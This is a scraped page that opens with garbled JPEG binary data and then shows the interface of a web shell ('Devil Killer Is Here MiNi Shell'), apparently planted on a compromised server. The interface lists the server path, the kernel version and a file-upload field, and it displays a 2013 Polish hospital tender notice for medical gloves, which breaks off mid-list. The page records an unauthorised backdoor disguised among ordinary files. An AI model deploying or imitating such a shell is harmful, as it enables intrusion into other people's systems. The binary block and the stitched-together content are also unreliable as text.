JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130925/389570-N-2013.html

<p class="kh_header"><b>Włocławek: ZP-29-2013  DOSTAWA REKAWIC MEDYCZNYCH</b><br>
<b>Numer ogłoszenia: 389570 - 2013; data zamieszczenia: 25.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital.wloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP-29-2013  DOSTAWA REKAWIC MEDYCZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa rękawic medycznych  opisanych poniżej: 
ZADANIE 1  RĘKAWICE  DIAGNOSTYCZNE
1.RĘKAWICE  DIAGNOSTYCZNE  LATEKSOWE
S op. 100 szt. - gwaramntowana ilość op. na 1 rok 3200 
                    - ilość na rok wg prawa opcji-zwiększenie 3840

M op. 100 szt. - gwaramntowana ilość op. na 1 rok 8700
                    - ilość na rok wg prawa opcji-zwiększenie 10440

L op. 100 szt.- gwaramntowana ilość op. na 1 rok 250 
                    - ilość na rok wg prawa opcji-zwiększenie 300

2.RĘKAWICE  DIAGNOSTYCZNE WINYLOWE

S op. 100 szt. - gwaramntowana ilość op. na 1 rok  1000
                    - ilość na rok wg prawa opcji-zwiększenie 1200

M op. 100 szt. - gwaramntowana ilość op. na 1 rok 2000 
                    - ilość na rok wg prawa opcji-zwiększenie 2400

L op. 100 szt. - gwaramntowana ilość op. na 1 rok 150 
                    - ilość na rok wg prawa opcji-zwiększenie 180

XL op. 100 szt - gwaramntowana ilość op. na 1 rok 300 
                    - ilość na rok wg prawa opcji-zwiększenie 360

3. RĘKAWICE  DIAGNOSTYCZNE  NITRYLOWE

M op. 100 szt.- gwaramntowana ilość op. na 1 rok  9500
                    - ilość na rok wg prawa opcji-zwiększenie 11400

L op. 100 szt.- gwaramntowana ilość op. na 1 rok 450
                    - ilość na rok wg prawa opcji-zwiększenie 540

XL op. 100 szt.- gwaramntowana ilość op. na 1 rok  250
                    - ilość na rok wg prawa opcji-zwiększenie 300
	
4.RĘKAWICE  DIAGNOSTYCZNE  LATEKSOWE STOSOWANE DO PROCEDUR ZWIĘKSZONEGO RYZYKA

M op. 50 szt.  - gwaramntowana ilość op. na 1 rok 50
                    - ilość na rok wg prawa opcji-zwiększenie 60
	
L op. 50 szt. - gwaramntowana ilość op. na 1 rok  50
                   - ilość na rok wg prawa opcji-zwiększenie 60


ZADANIE 2  RĘKAWICE  CHIRURGICZNE
1.RĘKAWICE  CHIRURGICZNE  LATEKSOWE

6 para	- gwaramntowana ilość par na 1 rok  3600
             - ilość na rok wg prawa opcji-zwiększenie 4320

7 para	- gwaramntowana ilość par na 1 rok 25000
             - ilość na rok wg prawa opcji-zwiększenie 30000

7,5 para	- gwaramntowana ilość par na 1 rok  20000
             - ilość na rok wg prawa opcji-zwiększenie 24000

8 para	- gwaramntowana ilość par na 1 rok  9600
             - ilość na rok wg prawa opcji-zwiększenie 11520

2.RĘKAWICE  CHIRURGICZNE  LATEKSOWE DO ZABIEGÓW MIKROCHIRURGICZNYCH	
7 para	- gwaramntowana ilość par na 1 rok 1000  
             - ilość na rok wg prawa opcji-zwiększenie 1200

7,5 para	- gwaramntowana ilość par na 1 rok  1000
             - ilość na rok wg prawa opcji-zwiększenie 1200

8 para	- gwaramntowana ilość par na 1 rok  1000
             - ilość na rok wg prawa opcji-zwiększenie 1200

3.RĘKAWICE  CHIRURGICZNE  LATEKSOWE DO ZABIEGÓW ORTOPEDYCZNYCH

8 para     - gwaramntowana ilość par na 1 rok  1000
             - ilość na rok wg prawa opcji-zwiększenie 1200

4.RĘKAWICE  CHIRURGICZNE  LATEKSOWE DO ZABIEGÓW GINEKOLOGICZNYCH
	
M para	- gwaramntowana ilość par na 1 rok  2000
             - ilość na rok wg prawa opcji-zwiększenie 2400

5.RĘKAWICE  CHIRURGICZNE  BEZLATEKSOWE

7 para	- gwaramntowana ilość par na 1 rok  3000
             - ilość na rok wg prawa opcji-zwiększenie 3600

8 para	- gwaramntowana ilość par na 1 rok 5400  
             - ilość na rok wg prawa opcji-zwiększenie 6480.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający zgodnie z art. 45 pkt. 2 ustawy Prawo zamówień publicznych Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego opisu sposobu dokonania oceny spełnienia warunku w tym  zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykonywał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje główne dostawy w okresie ostatnich trzech lat,a jeżeli okres działalności jest krótszy-w tym okresie-co najmniej 2 dostawy w zakresie dostaw rękawic medycznych za  wartość brutto 50.000,00 zł każda;
Zamawiający oceni spełnienie przez Wykonawców tego warunku na podstawie załączonego do oferty  wykazu głównych dostaw, zgodnie z załącznikiem nr 5 do SIWZ

1. Celem potwierdzenia spełnienia warunku posiadania  niezbędnej wiedzy i doświadczenia określonego 
   (warunek określony  w rozdziale V pkt 2),   Zamawiający wymaga złożenia wraz z   ofertą przetargową:  

a.	 wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w zakresie dostaw rękawic medycznych w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz z załączeniem dowodów  czy  zostały wykonane lub są wykonywane należycie. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedstawi - co najmniej 2 dostawy w zakresie dostaw rękawic medycznych za wartość brutto 50.000,00 zł każda  zgodnie  z Załącznikiem nr 5  do niniejszej   specyfikacji;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego opisu sposobu dokonania oceny spełnienia warunku w tym   zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego opisu sposobu dokonania oceny spełnienia warunku w tym   zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego opisu sposobu dokonania oceny spełnienia warunku w tym  zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">4. Celem potwierdzenia, że oferowana usługa odpowiada opisowi przedmiotu zamówienia  Zamawiający żąda złożenia do każdego zadania:
a. oświadczenia, że oferowany asortyment  spełnia warunki ustawy o wyrobach medycznych z dnia 20 maja   2010r. o wyrobach medycznych  ( Dz. U. nr 107, poz. 679 ),
b. deklarację zgodności i oznaczenie znakiem CE,
c. bezpłatnych  próbek oferowanego asortymentu z  ważnym terminem  przydatności  do zużycia (co  najmniej 6 m-cy)  w ilościach określonych na formularzu  cenowym.
    Każdy oferowany asortyment musi posiadać opis w języku  polskim.
Próbki należy dostarczyć w dniu otwarcia ofert na adres Wojewódzki Szpital  Specjalistyczny                               im. błogosławionego księdza Jerzego Popiełuszki, ul.  Wieniecka 49, 87- 800  Włocławek, Zamówienia Publiczne, pokój 303.
 Dostarczone próbki winny być umieszczone w odrębnym od Oferty opakowaniu i  odpowiednio oznaczone: PRÓBKI do przetargu ZP-29-2013 pod nazwą Dostawa rękawic medycznych  Zadanie.....  
Próbki są materiałem zużywalnym i ni podlegają zwrotowi.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje  dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed
właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. W odniesieniu do tego oświadczenia powinno być ono wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do 
    wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
    Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z   nich przy wykonaniu zamówienia, wówczas należy powyższe załączyć do oferty.

6. Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest do złożenia 
   niżej wymienionych dokumentów:
a.  wypełniony i podpisany  Druk ofertowy, zgodnie z Załącznikami nr 1 do  niniejszej  specyfikacji;
b. wypełniony i podpisany  Formularz asortymentowo-cenowy, zgodnie z Załącznikami nr 1.1.-1.2. do 
     niniejszej  specyfikacji;

c. oświadczenie z art. 22 ust. 1 ustawy pzp o spełnieniu warunków udziału w postępowaniu, zgodnie z 
    Załącznikiem nr 2 do niniejszej  specyfikacji;
d. oświadczenie z art. 24 ust. 1 ustawy pzp o braku podstaw do wykluczenia, zgodnie z  Załącznikiem  
   nr 3 do niniejszej specyfikacji;
e. wykazu głównych dostaw, zgodnie z załącznikiem nr 5 do  niniejszej specyfikacji;
f. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w 
   przypadku  podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych ;  

Uwaga: dokumenty wymienione w pkt c muszą być złożone w oryginale,  w pkt a, b, d, e, w oryginale  lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę, w przypadku pełnomocnictwa może być złożony oryginał lub kserokopia poświadczona za zgodność z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia, które zostaną wprowadzone do treści  zawieranej  umowy w sprawie 
zamówienia publicznego, ogólne   warunki umowy
1. Strony przewidują możliwość istotnych zmian umowy w stosunku do treści oferty w przypadku,  gdy:
1)	nastąpi obniżenie ceny;
2)	nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji;
3)	nastąpią zmiany osób wskazanych przez strony do realizacji umowy;
4)	nastąpi zmiana numeru katalogowego nie powodująca zmiany przedmiotu umowy.
2. Zamawiający dopuszcza także w szczególnych sytuacjach i za jego pisemną zgodą w trakcie trwania umowy zmianę przedmiotu umowy dostarczanego przez Wykonawcę, w szczególności w sytuacji gdy zaprzestano lub zawieszono produkcję danego towaru objętego umową, na inny towar o parametrach nie gorszych niż opisane w SIWZ, przy czym cena tego towaru zamiennego nie może przekraczać ceny towaru, na który została podpisana umowa. W przypadku   zaprzestania lub zawieszenia produkcji towaru objętego umową Wykonawca winien udokumentować ten   fakt. 
3. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem ich nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.wlolcawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. błogosławionego księdza Jerzego Popiełuszki we Włocławku,              
 ul. Wieniecka 49, 87-800 Włocławek  (budynek  administracji, pokój 303).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny im. błogosławionego księdza Jerzego Popiełuszki we Włocławku,              
 ul. Wieniecka 49, 87-800 Włocławek  (budynek  administracji, pokój 303).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE 1  RĘKAWICE  DIAGNOSTYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 1  RĘKAWICE  DIAGNOSTYCZNE
1.RĘKAWICE  DIAGNOSTYCZNE  LATEKSOWE
S op. 100 szt. - gwaramntowana ilość op. na 1 rok 3200 
                    - ilość na rok wg prawa opcji-zwiększenie 3840

M op. 100 szt. - gwaramntowana ilość op. na 1 rok 8700
                    - ilość na rok wg prawa opcji-zwiększenie 10440

L op. 100 szt.- gwaramntowana ilość op. na 1 rok 250 
                    - ilość na rok wg prawa opcji-zwiększenie 300

2.RĘKAWICE  DIAGNOSTYCZNE WINYLOWE

S op. 100 szt. - gwaramntowana ilość op. na 1 rok  1000
                    - ilość na rok wg prawa opcji-zwiększenie 1200

M op. 100 szt. - gwaramntowana ilość op. na 1 rok 2000 
                    - ilość na rok wg prawa opcji-zwiększenie 2400

L op. 100 szt. - gwaramntowana ilość op. na 1 rok 150 
                    - ilość na rok wg prawa opcji-zwiększenie 180

XL op. 100 szt - gwaramntowana ilość op. na 1 rok 300 
                    - ilość na rok wg prawa opcji-zwiększenie 360

3. RĘKAWICE  DIAGNOSTYCZNE  NITRYLOWE

M op. 100 szt.- gwaramntowana ilość op. na 1 rok  9500
                    - ilość na rok wg prawa opcji-zwiększenie 11400

L op. 100 szt.- gwaramntowana ilość op. na 1 rok 450
                    - ilość na rok wg prawa opcji-zwiększenie 540

XL op. 100 szt.- gwaramntowana ilość op. na 1 rok  250
                    - ilość na rok wg prawa opcji-zwiększenie 300
	
4.RĘKAWICE  DIAGNOSTYCZNE  LATEKSOWE STOSOWANE DO PROCEDUR ZWIĘKSZONEGO RYZYKA

M op. 50 szt.  - gwaramntowana ilość op. na 1 rok 50
                    - ilość na rok wg prawa opcji-zwiększenie 60
	
L op. 50 szt. - gwaramntowana ilość op. na 1 rok  50
                   - ilość na rok wg prawa opcji-zwiększenie 60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE 2  RĘKAWICE  CHIRURGICZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 2  RĘKAWICE  CHIRURGICZNE
1.RĘKAWICE  CHIRURGICZNE  LATEKSOWE

6 para	- gwaramntowana ilość par na 1 rok  3600
             - ilość na rok wg prawa opcji-zwiększenie 4320

7 para	- gwaramntowana ilość par na 1 rok 25000
             - ilość na rok wg prawa opcji-zwiększenie 30000

7,5 para	- gwaramntowana ilość par na 1 rok  20000
             - ilość na rok wg prawa opcji-zwiększenie 24000

8 para	- gwaramntowana ilość par na 1 rok  9600
             - ilość na rok wg prawa opcji-zwiększenie 11520

2.RĘKAWICE  CHIRURGICZNE  LATEKSOWE DO ZABIEGÓW MIKROCHIRURGICZNYCH	
7 para	- gwaramntowana ilość par na 1 rok 1000  
             - ilość na rok wg prawa opcji-zwiększenie 1200

7,5 para	- gwaramntowana ilość par na 1 rok  1000
             - ilość na rok wg prawa opcji-zwiększenie 1200

8 para	- gwaramntowana ilość par na 1 rok  1000
             - ilość na rok wg prawa opcji-zwiększenie 1200

3.RĘKAWICE  CHIRURGICZNE  LATEKSOWE DO ZABIEGÓW ORTOPEDYCZNYCH

8 para     - gwaramntowana ilość par na 1 rok  1000
             - ilość na rok wg prawa opcji-zwiększenie 1200

4.RĘKAWICE  CHIRURGICZNE  LATEKSOWE DO ZABIEGÓW GINEKOLOGICZNYCH
	
M para	- gwaramntowana ilość par na 1 rok  2000
             - ilość na rok wg prawa opcji-zwiększenie 2400

5.RĘKAWICE  CHIRURGICZNE  BEZLATEKSOWE

7 para	- gwaramntowana ilość par na 1 rok  3000
